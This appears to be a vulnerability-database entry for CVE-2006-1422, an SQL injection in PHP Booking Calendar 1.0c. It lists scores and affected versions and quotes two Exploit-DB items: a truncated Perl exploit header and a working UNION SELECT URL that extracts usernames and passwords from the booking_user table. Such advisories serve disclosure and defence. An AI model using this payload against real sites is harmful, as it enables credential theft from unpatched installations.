CVE-2006-1422
Published 2006-03-28
Priority: P4 (30) | medium | CVSS 2.0: 5
CVSS vector: AV:N/AC:L/Au:N/C:N/I:P/A:N
EXPLOIT
EPSS: 1.08% (60.8th percentile)
SQL injection vulnerability in details_view.php in PHP Booking Calendar 1.0c and earlier allows remote attackers to execute arbitrary SQL commands via the event_id parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| jjwwebdesign | phpbookingcalendar | <= 1.0c | — |
No detection rules found.
Exploit-DB
phpBookingCalendar 10 d - SQL Injection
exploitdb·2008-05-29
---
# Portal :PHP Booking Calendar 10 d (sql/upload) Exploit
# Modified 2008
# Download : https://sourceforge.net/project/showfiles.php?group_id=132702
# exploit aported password crypted
########################################
#[*] Founded & Exploited by : Stack
#[*] Contact: Ev!L =>> see down
#[*] Greetz : Houssamix & Djekmani & Jadi & iuoisn & Str0ke & All muslims HaCkeRs :)
################################################################################
# Exploit-DB Note (May 28th 2012)
# PHP Booking Calendar 10e is also affected by this
#
#
#!/usr/bin/perl -w
########################################
# * TITLE: PerlSploit Class
# * REQUIREMENTS: PHP 4 / PHP 5
# * VERSION: v.1
# * LICENSE: GNU General Public License
# * ORIGINAL URL: http://www.
Exploit-DB
phpBookingCalendar 1.0c - 'details_view.php' SQL Injection
exploitdb·2006-03-25
---
PoC by undefined1_ @ bash-x.net/undef/
phpBookingCalendar <= 1.0c
"A PHP/MySQL Booking Calendar Application."
http://www.jjwdesign.com/booking_calendar.html
phpBookingCalendar is prone to a SQL injection attack. The SQL injection works regardless of any magic_quotes_gpc settings.
www.site.com/details_view.php?event_id=1 and 1=0 union all select 1,1,username,1,1,1,1,1,1,passwd,1,1,1 from booking_user
# milw0rm.com [2006-03-25]
No writeups or analysis indexed.